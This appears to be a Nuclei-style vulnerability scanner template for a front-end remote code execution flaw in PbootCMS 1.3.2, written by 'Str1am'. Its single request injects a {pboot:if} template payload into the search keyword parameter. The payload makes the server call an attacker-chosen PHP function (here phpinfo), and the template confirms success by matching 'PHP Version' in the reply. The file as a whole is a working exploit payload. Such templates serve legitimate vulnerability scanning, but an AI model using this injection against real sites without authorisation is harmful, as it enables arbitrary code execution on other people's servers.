id: PBOOTCMS-rce

info:
  name: pbootcms开源建站系统1.3.2版本前台任意代码执行
  author: Str1am
  severity: medium
  tags: PBOOTCMS,rce

requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php/Search/index?keyword={pboot:if(true)$a=$_GET[b];$a();//%20)})}{/pboot:if}&b=phpinfo"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "PHP Version"
        part: body
        condition: and